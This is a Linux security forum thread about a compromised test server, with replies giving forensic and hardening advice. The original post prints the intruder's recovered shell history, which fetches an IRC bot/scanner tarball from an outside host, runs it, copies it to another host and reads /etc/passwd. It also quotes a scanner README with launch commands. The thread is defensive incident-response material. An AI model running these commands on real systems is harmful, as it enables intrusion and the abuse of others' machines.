Linux - Security
This forum is for all security-related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
I am a newbie Linux sysadmin (but seasoned Windows administrator), and I have five boxes running in a test environment. I thought that until we went live with our production servers, we were safe, and we could let our guard down. But, after I got a Nagios [monitoring service] alert that my SQL server was running a large number of processes, I knew something was wrong.
I logged on and ran a ps -e command. It came back that there were a large number of ssh-scan processes running under the pts/2 terminal, but who and users showed that I was the only person logged on. I did a killall ssh-scan to eliminate the threat, cleaned up the rest of the pts/2 processes with ps -e | grep pts/2, changed the root password to a good, strong password, and thought I was done.
Except I wasn't. Two days later, we went through the same routine. Then again after that. Someone told me that bash logs every command, so I ran locate .bash_history. It turned up histories for our users, one in the root directory, and one in the /var/lib/mysql folder. What? We don't use MySQL, we only use PostgreSQL. I'd found my clue!
Unfortunately, that's where I ran out of knowledge. I tried googling a few of the commands, but I wasn't able to figure out the breadth of the attack. I am posting the entire transcript here; maybe someone can tell me where I should be looking to find more files that he may have dropped on our hard drive, or backdoors that he may have created. At the very least, it can be indexed by Google and save someone else a bit of trouble.
-Simon
Code:
cd /
ls
cd /
cd home
cd /
cd /tmp
ls
rpm MySQL*
rpm -i MySQL*
su
exit
su
exit
w
uname -a
cat /proc/cpuinfo
/sbin/ifconfig | grep inet
cat /etc/hosts
passwd
w
w
uname -a
cat /proc/cpuinfo
/sbin/ifconfig | grep inet
cd /var/tmp
ls -a
mkdir " "
cd " "
wget {censored}/mech-linux.tgz
cd /var/tmp
mkdir .,
cd .,
ls -a
tar xvf mech-linux.tgz
cd mech-linux
./bash
w
ps -x
cd /var/tmp
cd .,
cd mnech-linux
cd mech-linux
./bash
w
ps -x
cd /var/tmp
cd .,
cd mech-linux
./bash
w
ps -x
cd /var/tmp
cd .,
ls -a
scp mech-linux.tgz guest@{censored}:/var/tmp/.,
w
cd /var/tmp
cd .,
cd dev2
cat vuln.txt
cd mech-linux
export PATH="."
bash
w
cd /var/ymp
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
ps -x
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
ps -x
w
cd /var/tmp
cd .,
cd " "
ls -a
cd /tmp
ls -a
cd " "
cd " "
cd /dev/shm
cd .,
ls -
ls -a
cd /var/tmp
mkdir " "
cd " "
cat /etc/passwd
cd " "
ls -a
cd /var/tmp
cd " "
wget {censored}/mech-linux.tgz
tar xvf mech-linux.tgz
cd mech-linux
export PATH="."
bash
w
ps -x
kill -9 3639
/sbin/ifconfig | grep inet
cat /etc/hosts
cat /etc/passwd
cd /var/tmp
cd .,
cd " "
ls -a
rm -rf *
cd /var/tmp
rm -rf " "
mkdir .,
cd .,
wget {censored}/mech-linux.tgz
tar xvf mech-linux.tgz
cd mech-linux
pico 1.user
nano 1.user
nano 2.user
nano 3.user
touch 4.user
nano 4.user
nano m.set
export PATH="."
bash
w
cd /var/tmp
cd .,
cd dev2
cat vul
cd mech-linux
export PATH="."
bash
w
ps -x
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
w
ps -x
w
cd /var/tmp
cd .,
cd mech-linux
export PATH="."
bash
After I posted the question, I looked at it again and saw that the logs gravitated around the /var/tmp folder quite a bit, so I wanted to start poking around there. I ran an ls, but it came up empty, so I tried again, this time with ls -a. Now I got something: ., .., and ". ". I knew from a previous poster that when he was hacked, he had found files installed in a directory called ". " (a dot followed by a space), so I tried that. It worked! I dropped into /var/tmp/". "! Another ls -a, and I saw another hidden folder, .S008. Below this, I found my portscanner! I have posted the README for indexing.
I also see that all the files were owned by the postgres user. I guess we forgot to change the password when we installed it. Oops.
BTW, I uninstalled MySQL right away. Hopefully that puts an end to the problems right there.
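The dot-space trick described above is easy to reproduce safely in a scratch directory; a minimal sketch (all paths here are illustrative, not from the compromised box):

```shell
# Demo: a directory named ". " (dot-space) is invisible to a plain ls and
# easy to misread in ls -a output; quoting the name is the way in.
scratch=$(mktemp -d)
mkdir "$scratch/. "            # attacker-style hidden directory
ls "$scratch"                  # prints nothing: the dir looks empty
ls -a "$scratch"               # shows .  ..  and ". "
cd "$scratch/. " && pwd        # quoting the trailing space gets you inside
```

Any name starting with a dot is skipped by plain ls, and the trailing space makes the entry blend into ls -a output, which is exactly why these names are popular drop locations.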
Quote:
[Translated from Romanian:]
-> for background scanning, run: nohup ./start 211 >> /dev/null &
-> to scan inside screen, run: chmod +x * , ./screen , ./start 211 , ctrl a+d (to exit screen while leaving the scan running);
-> for normal mode, run: ./a 211.211
-> 211 and 211.211 are examples, since I know there are some idiots who won't get it.
good luck
SpeedNet & RootF*ck
Quote:
Originally Posted by SimonHova
I am a newbie Linux sysadmin (but seasoned Windows administrator), and I have five boxes running in a test environment. I thought that until we went live with our production servers, we were safe, and we could let our guard down. But, after I got a Nagios [monitoring service] alert that my SQL server was running a large number of processes, I knew something was wrong.
(snip!)
BTW, I uninstalled MySQL right away. Hopefully that puts an end to the problems right there.
You might be being a bit optimistic. Are you familiar with the CERT Checklist? If not, now might be a good time to start working through it. I'm not a security expert, but what I've picked up here tells me that HOPE has no place in this. You have to KNOW how they got in. As in you have evidence. In fact, since they installed MySQL, I can pretty much guarantee that you haven't put an end to anything. The original vulnerability that let them in is still there.
Since you already got one *good* reply I'll try and expand a bit more.
Quote:
Originally Posted by SimonHova
I have five boxes running in a test environment. I thought that until we went live with our production servers, we were safe, and we could let our guard down.
Funny, isn't it, how these disasters aren't caused by computers but by human decision-making...
Quote:
Originally Posted by SimonHova
I logged on and ran a ps -e command. It came back that there were a large numbers of the ssh-scan command running under the pts/2 terminal. But who and users showed that I was the only person on.
'who' and 'users' rely on /var/run/utmp. It may be wiped, it may be altered, it may be subject to other kinds of malarkey, and it will only show those currently logged in. 'last' (and 'lastb' if you use /var/log/btmp) shows current and past login records, though it can be subject to the same tampering. Then there's the kernel, services and processes that log to files in /var/log. Though subject to the same, if "mined" in a timely fashion (logwatch, swatch, etc.) those logs can serve as an "early warning system" for those "rattling the door", so to speak, because unless they already know the target, some recon must be done to know where to hit. Recon may come in different forms, from a messy nmap scan of about every port they know about, to HTTP probes for directories that don't exist, to SSH brute forcing. Even if you run an IDS plus a restrictive firewall plus login restrictions plus SELinux, logs are your first warning and often your first clue.
Quote:
Originally Posted by SimonHova
I did a killall ssh-scan to eliminate the threat, cleaned up the rest of the processes
Being on the system is good, because you can *correct* things. Being on the system without a plan is bad, because you may disturb things and literally walk over "evidence". Killing is a good reflex: most things dead don't resurrect easily ;-p Killing is a bad first reflex because you destroy "evidence" that might help you locate where the "trouble" resides. Plus it might serve as a warning to perps hiding on the system that someone's onto them. Unless there's a rootkit involved, using '/bin/ps axwwwe' should give you all processes plus full-width arguments plus process environment info to examine or save for later analysis. Companion commands are 'lsof -n' for open files and 'netstat -na' for network connections. Saving all of this info (preferably remotely) gives you tangible "evidence" (if any).
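Those three commands can be wrapped into a small collection step run before killing anything. A minimal sketch, assuming the tools are installed; the evidence directory name is an example (in practice you would write to removable or remote storage):

```shell
# Sketch: snapshot volatile state to a timestamped directory before touching
# anything, so the process/file/socket picture is preserved as evidence.
EVID="$(mktemp -d)/evidence-$(date +%Y%m%d-%H%M%S)"
mkdir -p "$EVID"
# All processes with full-width arguments and environment; fall back to a
# plain listing if this ps doesn't accept BSD-style flags.
ps axwwwe   > "$EVID/ps.txt" 2>/dev/null || ps -ef > "$EVID/ps.txt"
lsof -n     > "$EVID/lsof.txt"    2>/dev/null || true  # open files, no DNS lookups
netstat -na > "$EVID/netstat.txt" 2>/dev/null || true  # sockets, numeric addresses
ls -l "$EVID"
```

Copying the resulting directory off the machine (scp to a trusted host) keeps the evidence out of the attacker's reach.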
Quote:
Originally Posted by SimonHova
Except I wasn't. Two days later, we went through the same routine. Then after that as well. Someone told me that bash logs every command, so I ran locate .bash_history. I came up with our users, one in the root directory, and one in the /var/lib/mysql folder. what? We don't use MySQL, we only use PostgreSQL. I found my clue!
'locate' relies on the locate database, which means it's only valid for as long as things don't change. The 'find' command works in real time and is a more versatile way of looking for things. Note that shells like Bash allow a user to redirect their history to the bit bucket, so unless the perp was caught red-handed, the shell history contents, and the fact that somebody didn't delete it, may tell you something about the perp's MO or skill.
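The difference is easy to demonstrate: a file created a moment ago is visible to find immediately, while locate would not see it until updatedb rebuilds its database. A small sketch using a scratch directory:

```shell
# Demo: find walks the live filesystem, so a just-created file shows up at
# once; locate would miss it until its database is next rebuilt by updatedb.
scratch=$(mktemp -d)
touch "$scratch/.bash_history"                 # freshly dropped file
find "$scratch" -name ".bash_history" -mtime -1 -print   # modified < 24h ago
```

The same pattern (find with -mtime or -newer against a known-good file) is a quick way to sweep /var/tmp, /tmp and /dev/shm for recently dropped files during an incident.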
Quote:
Originally Posted by SimonHova
I am posting the entire transcript here, maybe someone can tell me where I should be looking to find more files that he may have dropped on our hard drive, or backdoors that he may have created.
Unfortunately what you have here is the aftermath, the stuff they did after the breach, which isn't that "interesting" because it shows nothing but things related to IRC and such. Look in the system and daemon logs for clues. Verify your filesystem contents. Regardless of the perp's MO, if you have any doubts, run your investigation from a live CD like HELIX, KNOPPIX, or your distro's installer CD in rescue mode, because from this history (and even though I doubt it) you can't tell for certain that they didn't elevate privileges by running some exploit on you.
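"Verify your filesystem contents" can mean rpm -Va / debsums on a packaged system, or a checksum baseline you maintain yourself. A minimal sketch of the baseline idea, using a scratch file standing in for a real system binary:

```shell
# Sketch: record known-good checksums, then re-check later; a replaced
# binary shows up as a FAILED line. In practice run the re-check from a
# rescue environment so a rootkit can't lie to the tools themselves.
scratch=$(mktemp -d)
echo 'original' > "$scratch/ls"                # stand-in for a system binary
sha256sum "$scratch/ls" > "$scratch/baseline"  # baseline the known-good state
echo 'trojaned' > "$scratch/ls"                # simulate a swapped-in binary
sha256sum -c "$scratch/baseline" || echo "mismatch: investigate this file"
```

Tools like AIDE and Tripwire automate exactly this, with the important caveat that the baseline must predate the compromise to be worth anything.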
Basic rule for "victims": first read, then make a plan, then execute. Not the other way around ;-p
One thing I learnt along the way is not to typecast people, and not to make assumptions or accusations during the investigative phase, for reasons of objectivity. I'm not saying you do, or mean to do so here, but I know that if I do, I might limit my view of the perp due to my own expectations and perceptions.
* Forgot to say that if one box in a set gets compromised, check the others as well.
The "attacker" is a newbie script kiddie from Romania who found some tutorials and programs about hacking on DC++ and stumbled on your server. With absolutely no security, it was like a playground for him. He will probably not come back, but just in case, monitor for a Romanian IP (the censored host in "wget {censored}/mech-linux.tgz" might be his own IP address).
Why I say he is a newbie from Romania: because he didn't erase his tracks, and the language of the README you posted is Romanian (I fell off my chair laughing when I read it, because Romanian isn't such a popular language).
I knew a couple of these kinds of hackers, and after they "hacked" a server they never returned. They just did it for fun, to brag to their friends, and to have an IRC bot.
Also, look in the logs to see where the SSH connections came from, and keep monitoring in case he comes back for more fun.
To be safe, install a newer version of your distro with all the latest security patches applied.
I'd look at the timestamps of the files in the " " directory in /var/tmp and try to correlate them with the system log entries from around that time. Perhaps you will find a bunch of failed SSH password attempts and then one successful one, or that a service crashed and shortly afterwards a new user was created, etc. If the attacker didn't remove his tracks from .bash_history, there is a chance he didn't modify other logs either.
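A sketch of that correlation step, using a scratch directory standing in for /var/tmp's " " directory (auth log paths vary: /var/log/secure on Red Hat-style systems, /var/log/auth.log on Debian-style ones):

```shell
# Sketch: list the dropped files with full timestamps, newest first, so they
# can be matched by hand against sshd entries from the same time window.
scratch=$(mktemp -d)
mkdir "$scratch/ "                           # stand-in for /var/tmp/" "
touch "$scratch/ /mech-linux.tgz"            # stand-in for the dropped tarball
ls -lat --time-style=full-iso "$scratch/ "
# Then pull sshd lines from whichever auth log the distro uses:
grep -h 'sshd' /var/log/secure /var/log/auth.log 2>/dev/null | tail -5
```

A run of "Failed password" lines ending in one "Accepted password" near the tarball's mtime is the classic brute-force signature to look for.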
After reading this thread I think one important piece of advice has been missed: a compromised server should never be "cleaned up" and used again with the same operating system image. Even novice Romanian script kiddies have prepackaged backdoors, so there is always a chance that your system has been rootkitted. Therefore my recommendation is always to image the system and then completely re-install it, making sure that all of the latest patches have been installed before making it live, and adding extra hardening options such as SELinux and grsecurity.
You can then investigate the break-in on the imaged drive, which is more likely to be accurate, since rootkits can undermine the integrity of the live system, for instance by hiding files.
In general I agree with jamesapnic, but there are usually exceptions to the rule. What if the attacker only had user privileges? What if management can't tolerate the downtime? What if you have a complete bash_history record of what the attacker did, and the knowledge to fix it? What if there isn't any evidence of a rootkit? What if you're filtering outbound traffic and the attacker wasn't even able to put his tools on your system? Or if the service is chrooted and there isn't any evidence of him escaping it?
I think there are a number of things to consider. Each incident is different so the response should be adjusted accordingly.
I agree. That's why I've always made it a point that incident threads should be handled more carefully than any other threads (I'm not implying that was the case here). I'd even go so far as to say the first reply should be handled by those who handle incidents for a living, or who at least have a proven reputation at LQ for handling incidents. Mind you, the reason for that is not to drive others away (any solid advice is welcome), but because few people here have the time and knowledge to go in-depth and handle things in a formal and structured way, from initial assessment to mop-up.
For instance, most of the time the OP will not post all the required info. While it's tempting to post advice ("nanananah, I wedged in my reply first!!!"), the *best* way to start off would be to *ask questions* to clear things up. Once you have completed such an assessment you have a picture of things, and it is more effective to base advice on that. If anyone is interested in handling incidents "the right way" (at least in my opinion), please check back through this forum's previous incident threads (especially the older threads), read the required stuff on the 'net and at LQ (for instance recaps like http://www.linuxquestions.org/questi...l?#post2291514) and just go for it.
Judging from where you found the initial traces, they probably used a weakness in one of your web applications to gain access, possibly in conjunction with a SQL injection attack or leveraging flaws in the database configuration. I'd say that because the home directory was /var/lib/mysql, even though you use PostgreSQL. They probably just ran a generic PHP/SQL attack and their script assumes that it's MySQL. Of course the other possibility is that you do have MySQL running as part of one of the applications you installed, so even though you're only consciously running PostgreSQL for your web apps, you actually have MySQL running too (and since you didn't realize it was running, you didn't take precautions to lock it down).
In any case, the vast majority of external break-ins these days come from poor web application security, so go over any web/db services running on that machine with a fine-toothed comb.
Quote:
Originally Posted by unSpawn
I agree. That's why I've always made it a point that incident threads should be handled more carefully than any other threads (I'm not implying that was the case here). I'd even go so far as to say the first reply should be handled by those who handle incidents for a living, or who at least have a proven reputation at LQ for handling incidents. Mind you, the reason for that is not to drive others away (any solid advice is welcome), but because few people here have the time and knowledge to go in-depth and handle things in a formal and structured way, from initial assessment to mop-up.
Yeah, I know of another security forum where only approved members can assist other members in recovering from incidents (mostly spyware). It makes sense, and helps prevent a bad situation from becoming worse.
Quote:
Originally Posted by unSpawn
For instance, most of the time the OP will not post all the required info. While it's tempting to post advice ("nanananah, I wedged in my reply first!!!"), the *best* way to start off would be to *ask questions* to clear things up. Once you have completed such an assessment you have a picture of things, and it is more effective to base advice on that. If anyone is interested in handling incidents "the right way" (at least in my opinion), please check back through this forum's previous incident threads (especially the older threads), read the required stuff on the 'net and at LQ (for instance recaps like http://www.linuxquestions.org/questi...l?#post2291514) and just go for it.
If you guys get enough of these incident threads, perhaps LQ needs an official Incident Report Form.
UnSpawn to the rescue again... I totally agree with him. There is a lot of time spent on incident response and handling. It is not something that can be learned overnight; it takes years and years of knowledge, and an understanding of how the system operates at the system level and/or kernel level. While there are always hackers out there, I would recommend that the OP look into extra security for the servers. There are hundreds of things he can do to increase the security of the system.
Kernel level:
Grsecurity
SELinux
RBAC
LIDS
Application level:
Apache mod_security
Hardened PHP
Chrooted processes
General security:
Disable root SSH logins in /etc/ssh/sshd_config
A remote syslog server that the systems log to
Daily log emails from the servers
Enforce strong passwords
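For the "disable root ssh" item, the relevant sshd_config directives look like the following; this sketch writes them to a scratch file so nothing live is touched (PasswordAuthentication and MaxAuthTries are common companion settings, not from the list above), and on a real system you would edit /etc/ssh/sshd_config and reload sshd:

```shell
# Sketch: the sshd_config lines behind "disable root ssh", written to a
# scratch file for illustration only.
cfg=$(mktemp)
cat > "$cfg" <<'EOF'
# no direct root logins over SSH
PermitRootLogin no
# key-based authentication only, defeats password brute forcing
PasswordAuthentication no
# drop the connection after three failed attempts
MaxAuthTries 3
EOF
grep '^PermitRootLogin' "$cfg"   # prints: PermitRootLogin no
```

Disabling direct root logins alone would have blunted this particular attack, since the transcript shows the intruder working from an unprivileged account and su'ing to root.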
Most of the stuff above will keep out the vast majority of script kiddies. If there is someone out there who wants into your system and he is good enough, then he will get in. BUT most of the people who have the knowledge to get into a hardened server are not going to bother with it; they have more important things to do than hack _your_ system.